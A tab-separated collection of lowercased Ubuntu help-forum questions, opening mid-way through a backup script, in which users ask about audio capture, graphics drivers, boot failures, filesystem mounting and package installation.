exit ; } echo `` backing up $ { fs } via rsync to : $ mountpoint ... '' | tee -a $ logfile 2 > & 1 echo `` sudo rsync $ { options } $ { excludes } $ { fs } /media/ubuntu_backup '' > > $ { logfile } 2 > & 1 eval sudo rsync $ { options } $ { excludes } $ { fs } /media/ubuntu_backup > > $ { logfile } 2 > & 1 || { echo -e `` warning : rsync returned an error : $ rc\nsee backup.out for details ! '' & & exit ; } df $ { filesystems [ $ fs ] } | tee -a $ logfile 2 > & 1 echo `` unmounting $ { filesystems [ $ fs ] } '' sleep 2 sudo umount $ { filesystems [ $ fs ] } || { echo `` $ 0 failed - problem unmounting partition : $ { filesystems [ $ fs ] } '' & & exit ; } done echo -e `` finished partition backups ... \n '' any advice/insights are welcome ...
410737	record desktop and microphone audio with avconv	i 'm using avconv on ubuntu 13.10 with gnome 3.10 to record minecraft screencasts . however , i can only get the sound from my microphone and not the laptop speaker . how would i go about recording both laptop and microphone ? i 'm using a usb headset with a microphone . info requested by @ sneetsher : the actual command : avconv -f pulse -i default -b 64k -f x11grab -r 25 -s 1280x800 -i :0.0 -vcodec libx264 -preset ultrafast -threads 4 -y myscreencast2.mp4 pulseaudio info : $ pactl list short 0 module-device-restore 1 module-stream-restore 2 module-card-restore 3 module-augment-properties 4 module-switch-on-port-available 5 module-alsa-card device_id= '' 0 '' name= '' pci-0000_00_1b.0 '' card_name= '' alsa_card.pci-0000_00_1b.0 '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' 6 module-alsa-card device_id= '' 1 '' name= '' usb-c-media_electronics_inc._usb_pnp_sound_device-00-device '' card_name= '' alsa_card.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' 7 module-udev-detect 8 module-bluetooth-policy 9 module-bluetooth-discover 10 module-native-protocol-unix 11 module-default-device-restore 12 module-rescue-streams 13 module-always-sink 14 module-intended-roles 15 module-suspend-on-idle 16 module-systemd-login 17 module-position-event-sounds 18 module-filter-heuristics 19 module-filter-apply 20 module-x11-publish display=:0 21 module-x11-bell display=:0 sample=bell.ogg 22 module-x11-cork-request display=:0 23 module-x11-xsmp display=:0 session_manager=local/melvin-124833 : @ /tmp/.ice-unix/2013 , unix/melvin-124833 : /tmp/.ice-unix/2013 0 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz idle 1 alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.iec958-stereo module-alsa-card.c s16le 2ch 44100hz idle 0 alsa_output.pci-0000_00_1b.0.analog-stereo.monitor module-alsa-card.c s16le 2ch 44100hz running 1 alsa_input.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz running 2 alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.iec958-stereo.monitor module-alsa-card.c s16le 2ch 44100hz running 3 alsa_input.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.analog-mono module-alsa-card.c s16le 1ch 44100hz running 15 0 28 protocol-native.c float32le 1ch 25hz 16 1 28 protocol-native.c float32le 1ch 25hz 17 2 28 protocol-native.c float32le 1ch 25hz 18 3 28 protocol-native.c float32le 1ch 25hz 0 module-systemd-login.c ( null ) 5 module-x11-xsmp.c ( null ) 6 protocol-native.c gnome-settings-daemon 7 protocol-native.c gnome-shell 8 protocol-native.c gnome-shell 9 protocol-native.c chrome 28 protocol-native.c pavucontrol 36 protocol-native.c pactl 0 screen-capture s16le 2ch 96000hz 0.872 1 bell-window-system s16le 2ch 44100hz 0.749 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c 1 alsa_card.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device module-alsa-card.c $ pactl stats currently in use : 12 blocks containing 548.2 kib bytes total . allocated during whole lifetime : 7254422 blocks containing 2.9 gib bytes total . sample cache size : 456.2 kib server string : unix : /run/user/1000/pulse/native library protocol version : 28 server protocol version : 28 is local : yes client index : 37 tile size : 65496 user name : guilmon host name : melvin-124833 server name : pulseaudio server version : 4.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.iec958-stereo default source : alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.iec958-stereo.monitor cookie : 3f2a:1764 updated screenshots : $ pactl list sources source # 0 state : suspended name : alsa_output.pci-0000_00_1b.0.analog-stereo.monitor description : monitor of built-in audio analogue stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 5 mute : no volume : 0 : 20 % 1 : 20 % 0 : -42.50 db 1 : -42.50 db balance 0.00 base volume : 100 % 0.00 db monitor of sink : alsa_output.pci-0000_00_1b.0.analog-stereo latency : 0 usec , configured 0 usec flags : decibel_volume latency properties : device.description = `` monitor of built-in audio analogue stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xe4644000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 284b '' device.product.name = `` 82801h ( ich8 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' formats : pcm source # 1 state : suspended name : alsa_input.pci-0000_00_1b.0.analog-stereo description : built-in audio analogue stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 5 mute : no volume : 0 : 84 % 1 : 84 % 0 : -4.50 db 1 : -4.50 db balance 0.00 base volume : 13 % -52.50 db monitor of sink : n/a latency : 0 usec , configured 0 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` ad198x analog '' alsa.id = `` ad198x analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xe4644000 irq 48 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 284b '' device.product.name = `` 82801h ( ich8 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analogue stereo '' device.description = `` built-in audio analogue stereo '' alsa.mixer_name = `` analog devices ad1981 '' alsa.components = `` hda:11d41981,103c30be,00100200 hda:14f12c06,103c1379,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone-internal : internal microphone ( priority : 8900 ) analog-input-microphone-dock : dock microphone ( priority : 7800 ) analog-input-microphone : microphone ( priority : 8700 ) active port : analog-input-microphone formats : pcm source # 5 state : suspended name : alsa_input.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.analog-mono description : usb pnp sound device analogue mono driver : module-alsa-card.c sample specification : s16le 1ch 48000hz channel map : mono owner module : 26 mute : no volume : 0 : 85 % 0 : -4.10 db balance 0.00 base volume : 40 % -23.81 db monitor of sink : n/a latency : 0 usec , configured 0 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` usb audio '' alsa.id = `` usb audio '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 1 '' alsa.card_name = `` usb pnp sound device '' alsa.long_card_name = `` c-media electronics inc. usb pnp sound device at usb-0000:00:1d.2-2 , full speed '' alsa.driver_name = `` snd_usb_audio '' device.bus_path = `` pci-0000:00:1d.2-usb-0:2:1.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1d.2/usb7/7-2/7-2:1.0/sound/card1 '' udev.id = `` usb-c-media_electronics_inc._usb_pnp_sound_device-00-device '' device.bus = `` usb '' device.vendor.id = `` 0d8c '' device.vendor.name = `` c-media electronics , inc. '' device.product.id = `` 0139 '' device.product.name = `` usb pnp sound device '' device.serial = `` c-media_electronics_inc._usb_pnp_sound_device '' device.string = `` hw:1 '' device.buffering.buffer_size = `` 176400 '' device.buffering.fragment_size = `` 88200 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-mono '' device.profile.description = `` analogue mono '' device.description = `` usb pnp sound device analogue mono '' alsa.mixer_name = `` usb mixer '' alsa.components = `` usb0d8c:0139 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-usb '' ports : analog-input-microphone : microphone ( priority : 8700 ) active port : analog-input-microphone formats : pcm source # 8 state : suspended name : alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.analog-stereo.monitor description : monitor of usb pnp sound device analogue stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 26 mute : no volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db monitor of sink : alsa_output.usb-c-media_electronics_inc._usb_pnp_sound_device-00-device.analog-stereo latency : 0 usec , configured 0 usec flags : decibel_volume latency properties : device.description = `` monitor of usb pnp sound device analogue stereo '' device.class = `` monitor '' alsa.card = `` 1 '' alsa.card_name = `` usb pnp sound device '' alsa.long_card_name = `` c-media electronics inc. usb pnp sound device at usb-0000:00:1d.2-2 , full speed '' alsa.driver_name = `` snd_usb_audio '' device.bus_path = `` pci-0000:00:1d.2-usb-0:2:1.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1d.2/usb7/7-2/7-2:1.0/sound/card1 '' udev.id = `` usb-c-media_electronics_inc._usb_pnp_sound_device-00-device '' device.bus = `` usb '' device.vendor.id = `` 0d8c '' device.vendor.name = `` c-media electronics , inc. '' device.product.id = `` 0139 '' device.product.name = `` usb pnp sound device '' device.serial = `` c-media_electronics_inc._usb_pnp_sound_device '' device.string = `` 1 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-usb '' formats : pcm
410738	robomongo not switching keyboard layouts without reload on ubuntu	i have installed robomongo 0.8.4 ( a mongodb administering tool ) on ubuntu 13.10 with a deb-package downloaded from it 's official site . when i switch the keyboard layout it does switch system-wide but it does n't affect robomongo which continues using the same one . the correct keyboard layout is set in robomongo when you restart it . but of course restarting the program just to switch the keyboard is painful . has somebody encountered such a problem on either this program or may be another ?
410739	live usb boot error	i have a system without a hard drive . i 've used the start-up disk creator to copy the 13.04 .iso to the usb . i 've used the same usb on multiple systems to install to a second usb stick . on this system , it starts at the typical install screen gnu grub version 2.00-19ubuntu2 i click on try ubuntu without installing and i get this error : invalid cluster 149xxxxxx and then i get a giant screen of text that looks like [ 30.xxxxxxxx ] perf samples too long { 350648 > 200000 } , lowering kernel.perf event_max sample rate when i click `` install '' at the gnu grub screen , i get the ubuntu logo with the 5 dots below it and it stalls . please help
410742	extremely poor performance on intel hd 4000 graphics in 13.04	experiencing video tearing and extremely slow graphics while playing simple 3d games . i have installed the latest drivers from intel , modified `` xorg.conf '' , adjusted compiz settings , nothing seems to help . any suggestions would be helpful
410745	smbios newer tha 2.7 not fully supported by dmicode vgn-fs485b	i have an old ( 2006 ) sony vaio ( 1.73 ghz , ram upgraded to 2gb , model pcg-7l1m vgn-fs485b ) which was happily running ms-xp until i decided to ditch it before april . i have reinstalled ubuntu after continuing to get problems entereing numbers or lower case letters ( see recent question : garbled caps/lowercase on sony vaio vgn-fs485b . ) in doing so , when asked by the installer for the computer 's name i noted that the phrase '' smbios-implementations-newer-than-version-2-7-are-not-fully-supported-by-this-version-of-dmicode-vgn-fs485b '' was already entered in the box . what does this mean , could it be the source of my woes , and what can i do about it ? thanks .
410747	dual booting latest ubuntu and vista - 3 problems	as the title suggests i am looking for a way to dual boot the latest release of ubuntu ( but i can be flexible enough to downgrade due to resource insufficiency , maybe a suggestion as to a compatible version with my currect hardware ? ) and windows . i have validated cpu-z , all needed pc information is here : http : //valid.canardpc.com/n67x8p my question for that is what version of ubuntu would look and run best on this hardware . my current version of windows is windows vista sp2 . it is installed on one wd800 western digital black drive . i also installed two `` storage '' seagate barracuda drives ; one 80gb , one 40gb . i thought since 40gb is proportional to what vista requires and what ubuntu requires , i could go ahead and install it on that drive . but , there 's a problem : i tried the boot media , when i `` try '' it out , the screen is blank . would love some help on that too , before i go ahead and dual boot . now , once that problem is solved , i would love steps as to how to install ubuntu on one drive , while keeping my windows installation untouched , and have a grub boot menu to choose from the drives . thanks !
410748	sony vaio fit svf1521v1eb can not access secondary gpu	as a new ubuntu user i 've tried several distro 's including mint . everything works except for my graphics card . the laptop has an gt 740m gpu which has optimus . now i 've tried a lot of tutorials to the ' can not access secondary gpu ' issue , including installing bumblebee , primus and a lot of other things including the linux headers . ive also edited the .conf file changing the driver= to driver=nvidia-current method.i 'm running 13.10 nothing works , sometimes i get a black screen , sometimes nothing happens . but i always end up with the same error : [ error ] can not access secondary gpu - error : could not load gpu driver [ error ] aborting because fallback start is disabled . when using the lspci | grep 3d command i get : 01:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 ) opening my /etc/bumblebee/xorg.conf.nvidia i get : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection i came across this issue when i tried installing dead space 2 using playonlinux . it kept giving me the error that my laptop did n't meet the required specifications . remember , i 've tried a lot of tutorials and google and nothing worked , so if anyone could give me a detailed explanation and fix in such a way i can understand ; this is no longer an annoying issue , i want seriously want to know how to properly troubleshoot and fix these kind of problems ; ) thanks a lot in advance !
410749	i have bad video playback on ubuntu 13.10 with the amd e2 vision processor	i 'm running ubuntu 13.10 on an hp 2000 laptop with an amd e2 vision processor and 4gb ram . now the makers of amd claim it 's supposed to grant great video playback at hd but at 720p i get choppy video playback running only firefox or for that matter chromium . any advice .
410750	can not successfully create a bootable ubuntu usb drive	i am trying to create a bootable ubuntu usb drive . i tried the universal usb installer and unetbootin to create it but when i booted the usb stick , error loading operating system shows up . i tried changing the bios to boot from usb by default but always got the same error message . when i was in the universal usb installer it gave me this error message : can not open output file autorun.inf also an error prompt opens : an error occurred while executing syslinux . your usb drive wo n't be bootable . when it was extracting from 7zip . the drive is formatted as exfat . i 'm not sure if that is important . edit : re-downloading the iso did n't work or formatting the drive . edit 2 : since i could n't format it as normal fat i formatted it as ntfs and that worked .
410751	bash autocomplete feature does n't work when i create function for emacs	details about my system : i am running ubuntu 12.04.4 lts on oracle virtual box 4.3.6 , from windows 8.1 installed on an asus laptop . i 'm using bash_completion version 1.3 release ( i got this from the comments on the /etc/bash_completion file ) i thought bash always did auto complete for files and directories after a command . but after a google search and reading more about the bash_completion thing , i realized that this was different for different commands . but i 'm facing a problem with this auto-completion feature of bash when using an alternate way to invoke emacs -nw . i have defined ee as a function in my ~/.bash_aliases file . i know this is not an alias , but i am just using a function to do what an alias would do : function ee ( ) { emacs -nw `` $ @ '' } export -f ee i thought that i could still use tab completion with the ee function if i typed a partial file name . this just does n't seem to work . whereas if i typed in emacs -nw followed by a partial file name the tab completion works perfectly . i really do n't understand what is missing here . i checked the output of the command complete -p and i get the following for both emacs and ee : eakangk @ eakan-u-vbox : ~ $ complete -p | grep 'ee' complete -f _filedir_xspec ee eakangk @ eakan-u-vbox : ~ $ complete -p | grep 'emacs' complete -f _filedir_xspec emacs would n't that mean both commands should give me the same sort of behaviour when attempting auto completion ? edit : i had n't seen the ee line in the /etc/bash_completion file when posting the question . but now i know it is there . but the /etc/bash_completion file has the following lines : complete -f -x ' ! *. @ ( gif|jp ? ( e ) g|miff|tif ? ( f ) |pn [ gm ] |p [ bgp ] m|bmp|xpm|ico|xwd|tga|pcx ) ' ee complete -f -x '*. @ ( o|so|so. ! ( conf ) |a| [ rs ] pm|gif|jp ? ( e ) g|mp3|mp ? ( e ) g|avi|asf|ogg|class ) ' vi vim gvim rvim view rview rgvim rgview gview emacs xemacs sxemacs kate kwrite what am i doing wrong here ?
410752	xubuntu 13.10 boots to black screen after grub	i know this is a common theme , but all of the other similar threads i 've found were either based on a clear change ( e.g. , upgrading ) , or were unsolved . i 'm a relative newcomer to linux , but have a nice xubuntu setup that 's been working delightfully for a few months until just recently . after selecting ubuntu from grub ( i dual boot windows 7 ) i get the regular blue loading screen , then black . i can get to a terminal with ctrl+alt+f # , so i have hope , but not much idea of what to do . booting into recovery mode works , sort of . i get a low resolution gui and can open a terminal , but any graphical applications i try to launch ( like mousepad or the settings manager ) open in a window too small to do or see anything , which i can not resize , so it 's not particularly useful . the only possible cause i can think of for this issue is that right before the problem began i plugged my computer into a projector and messed around with the display settings and resolution to make that work . so , if anyone knows how to reset default display settings from terminal that might be a helpful start . computer is a two year old thinkpad t420 , native resolution 1600x900 , if that 's any help . thanks !
410755	ms frontpage installation	i want have ms frontpage as html editor on ubuntu . this software is a part of msoffice 2003 but is not part of it . i installed it by wine and it installed whithout any error . but as i am try to open it , it crashes rapidly . in other hand playonlinux have not any option for installation of frontpage .
410757	wireless internet ca n't connect to any computer but can access webpages	i am new to ubuntu so if this is a very n00by question , please do n't start to type some crazy comments down there . i have an wireless connection , i can access any webpage and it works well , but when i try to connect to a gaming server or ping an ip that is not in my lan network , it wo n't connect . p.s . i am using ubuntu 13.10 if it matters . thanks for support .
410758	if i download ubuntu , with cd , or windows installer , will it automatically dual-boot ?	so i want to install ubuntu , just to learn how to use linux . currently i 'm using windows 7 and i have ample hdd space . if i burn this os onto a cd , or use the wi , will it erase windows or cause windows problems ? or will it give me a dual boot option at the beginning of the boot .
410760	how can i remove the packages that came with ubuntu-desktop ? ( 13.10 )	i am on xubuntu 13.10 and installed the meta package ubuntu-desktop about one hour ago to try it out . unfortunately , it did not work well at all so i just went back to my xfce-session . now there are some things different and i 'd like to remove the packages which came with said meta package . is there a way to install the ones which just were installed by ubuntu-desktop ? maybe it can be done via some apt-get magic ?
410763	ifconfig command only displays 'lo '' interface but not others on ubuntu 12.10	when i type ifconfig -a on my computer , all i see is the lo device , not eth0 . also , when i type ifconfig interface , i get the following : interface : error fetching interface information : device not found i am not sure what i should do now , as i am fairly new to linux/ubuntu . i should also mention that i started out with 12.04 , but i could not get wireless access . my ethernet cable was still working and i thought that going from 12.04 to 13.10 would get me the necessary drivers for the wireless . i started the update from 12.04 to 12.10 and planned to continue from there , but now i can not get internet access anywhere . i basically dug myself in a bigger hole . if it helps at all , i have an hp envy touchsmart . thank you !
410765	ubuntu 64 bit download flagged as phishing site	while downloading ubuntu 64 bit iso , my anti-virus program ( kaspersky ) flagged the site as a phishing site . i was at 585mb of the 708mb file size when the alarm came up . has anyone else had this issue and is there a more secure server to download the software ?
410767	how to setting pip.ini to use cert	how to setting pip.ini to use cert for each link/url/find-links , example : find-links = http : //x.y.z/simple/ cert = xxx.pem http : //a.b.c/simple/ cert = sss.pem can i write like this ?
410769	high cpu usage in any browser	for about the last week , browsing the web from chrome beta , chrome stable , or firefox causes unusually high cpu usage . it idles ok , but spikes a fair amount , but loading any page , with or without flash , causes 100 % cpu for about 10 seconds . with more than a couple tabs open , the computer becomes unusable . i have tried disabling all plugins , using incognito mode in chrome ( essentially doing the same as disabling plugins ) , but nothing seems to help . ram usage also seems high , but not unreasonable , and i usually do n't pay too much attention , so it is probably normal . as far as i can remember i have not made any significant changes to the system to effect this . specs : hp elitebook 6930p 4gb ram intel core 2 duo 2.53 ghz amd/ati mobility 3450/3470 with proprietary legacy drivers ( catalyst ) edit : upon further investigation i have noticed that it is primarily xorg , and not the browser that actually eats the cpu . also , it is much worse while scrolling
410771	how to install picasa on ubuntu 12.04	iâve been trying all day to install picasa on 12.04 . i installed wine , downloaded picasa then had to install ie8 . this is all i get from terminal : ie8 install completed , but installed file /home/mr-yeomans/.tmp/dosdevices/c : /windows/ie8_main.log not found its driving me mad . please help .
410776	unknown filesystem type while mounting sdxc card	i 'm trying to mount my 64 gb sdxc card into my computer 's internal card reader but i get the following message : error mounting /dev/sdd at /media/renato/disk : command-line `mount -t `` exfat '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdd '' `` /media/renato/disk '' ' exited with non-zero exit status 32 : mount : unknown filesystem type 'exfat' what can i do to make ubuntu 13.10 64 bit read my sd card so i can download my pictures ?
410779	run all command inside script with typing the password one time	i want to write script inside the script i will do many commands that require to be root like sudo apt-get update sudo apt-get upgrade sudo apt-get install eclipse but i want to write the password just one time i tried to write in top sudo su to run as root but it stop the script so what i can so to write the password
410783	just installed ubuntu / noob/ trying to install chrome	after sudo dpkg -1 google-chrome* sudo ) password for me ( i ca n't enter text ) ?
410785	how to install snmp	i installed ubuntu on my black beaglebone and now need to install snmp , but use apt-get install snmp snmpd and gives error . how to install snmp ?
410786	why do i have to download a .deb file to update some already installed programs ?	for example , say i use anki . whenever anki updates , i have to go to their website , download a .deb , open it in ubuntu software center , and then click `` upgrade . '' my limited understanding of repositories says that anki should get updated when i run `` apt-get update '' and `` apt-get upgrade . '' why does n't it ? is there something i can do to change that ?
410789	efi disk error before grub loads lenovo	i have installed ubuntu 12.04 on a lenovo y510p . there are two issues i 'm not able to resolve - before the grub screen loads , i always get an efi disk error . i have tried turning off fast boot and secure boot as well as doing a smart check on the disk , but the error always comes up for 2-3s and then grub loads and i 'm able to select and load both ubuntu and windows 8 . can someone please help me resolve this ? when ubuntu loads there is a black splash screen with some messages , for 1-2s , before the ubuntu logo comes up in the middle of the screen with purple background . i 'm not sure if there is some error with ubuntu loading or just that i need to disable splash screen ? the boot repair is here http : //paste.ubuntu.com/6817526/ thanks !
410792	how to compile wireless driver for 13.10	im trying to compile a wireless driver for the realtek rtl8812au chipset . i got the tar file from github . i did a `` sudo make '' but i got some errors . and i would like to learn how to install it .
410797	trying to install ubuntu in primary partion .but converting logical to primary makes some problem	! [ enter image description here ] [ 1 ] actually mine is lenovo z580 and in my laptop already 2 os are installed i.e windows 7 , windows 8 and i want to install unbuntu but it 's not installing and two primary partions are there and trying to one disk logical to primary and it is showing that `` there is no free slot is available in mbr '' , help me out .
410798	blocksize error when mounting ufs drive in 12.10	i have an external hard drive that i was using with a nas4free computer . the computer died , and i would like to use the files on the external hard drive . nas4free is based on freebsd , so the external hard drive is formatted as ufs . i can almost get the external hard drive to mount on my ubuntu 12.10 laptop . when i plug in the hard drive to my laptop , i am told that it did n't mount via a popup message . i check dmesg | tail and am informed that ufs filesystems can only be mounted in read-only mode . no problem , i input the mount command and give it the `` -r '' ( that is , sudo mount -r -t ufs -o ufstype=ufs2 /dev/sdb1 /media/wsharetest ) . it still does n't mount , and dmesg | tail says `` ufs : failed to set blocksize '' . the mountpoint exists , it 's a mountpoint i 'd created to test stuff with . nothing is mounted there usually , only when i physically tell something to mount there is there anything there . this is where i 've been hitting a wall . as far as i can tell , the mount command does n't have a blocksize setting for the ufs filetype . any thoughts or ideas would be appreciated , thanks . edit : i realize i should include the output of fdisk -l. here it is : note : sector size is 4096 ( not 512 ) disk /dev/sdb : 4000.8 gb , 4000787025920 bytes 256 heads , 63 sectors/track , 60562 cylinders , total 976754645 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 1 976754644 3907018576 ee gpt
410799	how to get public/private key from cacert.pem	i has download cacert.pem from internet , but how to get cacert.key ? how to get public/private key from cacert.pem ?
410802	have tried lots of solutions , but after changin nvidia drivers now stuck in low graphics mode	i 've tried numerous solutions on here about getting out of low-graphics-mode on my nvidia graphics but nothing seems to work . i 'm thinking about completely re-loading the system from scratch , please tell me there is an easier solution as i have lots of data and do n't want to re-load everything ! slow computer with slow internet will take me forever..
410807	wi-fi not able to connect ubuntu 13.10	i am not able to connect to wi-fi in ubuntu 13.10 after booting up after a month . i got to the wifi option in the top toolbar but it says ethernet disconnected although i have wireless on my laptop . any ideas ?
410808	what is reason for apparmor= '' denied '' operation= '' open ''	jan 26 13:25:27 nanak-p570wm kernel : [ 3184.247986 ] type=1400 audit ( 1390703127.047:85 ) : apparmor= '' denied '' operation= '' open '' parent=2911 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/jagat/.config/dconf/user '' pid=7426 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1001 ouid=0 why above message in kern.log and how to fix it .
410812	command to delete old minecraft backups	i need to delete backups older than x days and i 'd like it to be automatic to a point . is there a way to clear backups on my minecraft server ?
410813	how to enable virtualization on booting ? ( ubuntu 13.10 )	i want to use virtual box but it giving me errors ( vt-x/amd-v hardware acceleration is not available on your system ) . and in the virtual box settings , i am not able to open accelerator tab as it 's frozen ( here 's the link - http : //bit.ly/virtualbox ) . i am new to ubuntu , so plz give me a step-wise method on how to boot the system and enable virtualization .
410816	boot repair wo n't finish running because commands wo n't run	boot repair asks me to run the following commands in terminal : sudo chroot `` /mnt/boot-sav/sda2 '' dpkg -- configure -a sudo chroot `` /mnt/boot-sav/sda2 '' apt-get install -fy sudo chroot `` /mnt/boot-sav/sda2 '' apt-get purge -y -- force-yes grub* shim-signed linux-signed* i think it 's so it can remove grub , then reinstall it . the first two commands run fine , but on the third one : the following packages will be removed : grub-common* grub2-common* ubiquity* ubiquity-frontend-gtk* 0 upgraded , 0 newly installed , 4 to remove and 297 not upgraded . after this operation , 22.5 mb disk space will be freed . dpkg : unrecoverable fatal error , aborting : reading files list for package 'libxv1 : amd64 ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i am trying to install ubuntu studio 13.1 as the main operating system on a 64 bit sony vaio sve series . it has uefi but i disabled secure boot . the disk wo n't install the entire thing because it ca n't copy a grub file to some target . it says the system wo n't boot withoout the file . ok , but i think most or all of ubuntu installed , so i 'm trying to fix the boot process from livecd . but i ca n't get boot-repair to go any further because it ca n't remove grub . any suggestions ?
410818	ubuntu sdk installation error on ubuntu 13.10	i followed the instructions from http : //developer.ubuntu.com/apps/create/get-the-sdk/ . but the installation failed with the following message at the end : the following packages have unmet dependencies : ubuntu-sdk : depends : ubuntu-sdk-libs-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . any idea why ? i have try to follow some of the similar problems already . but none can help so far .
410819	ubuntu translation , confused ( key to give keyboard-focus to the launcher )	what does it means `` to give keyboard-focus to the launcher '' . what is keyboard-focus and how can it be given to the launcher ? and i do n't understand `` gives keyboard-focus to the launcher so it can be navigated with the cursor-keys . '' also . and also , what is a `` cursor-key '' ?
410823	installing driver mf 180 problem in ubuntu 12.04	sir i am using ubuntu 12.04 and want to install driver of mf 180 bsnl 3g modem.when i install file driver_install.run , problem is opening the file/home/kajal/.cache/.fr-8 ... driver_install.run.plz help me.my lsusb showing bus 001 device 002 : id 19d2:0154 zte wcdma technologies msm , in third row .
410824	google earth : has the panoramio photos issue been resolved yet ?	obviously , i 'm still a noob after 18 months or so - long story : ) anyway , i just installed google earth 6 and - natch - got the `` invalid http request '' error messsage , the only solution to which was to upgrade to the latest version of ge ( 7.1.2.2041 as of today . ) as most of you know , empty white baloons appear where panoramio photos should be . any solutions yet ? my machine is a dell latitude e6420 with core i7 , nvidia switchable graphics and 4gb of ram , running 12.04 lts 64-bit in dual boot with windows 7 professional 64-bit .
410826	will upgrading 13.10 to 14.04 affect my full-disk encryption ?	will upgrading 13.10 to 14.04 affect my full-disk encryption ? i just recently installed 64-bit 13.10 with full disk encryption . will the next lts release in april affect and/or clash with my encrypted setup ?
410828	does downloading ubuntu 12.04 lts normally take around 10 hrs ?	i started downloading ubuntu 12.04 lts through wubi installer and it shows nearly 10 hrs required for download . disk space required is 18 gb which is readily available . should it actually take that long to be downloaded ?
410833	why does my camera pick up sound but not video on ubuntu 12.04 ? ( 32bit )	i have a microsoft lifecam nx-3000 that was working perfectly fine for skype yesterday and so far today skype wo n't even recognize that i have a camera plugged in.. i tried checking it in cheese too so it 's not just skype . any help would be greatly appreciated . lsusb shows i have my camera plugged in and i have tried the following inputs so far : sudo apt-get install libv4l-0 and the camera still was not working and sudo modprobe v4l1_compat gave me fatal : module v4l1_compat not found .
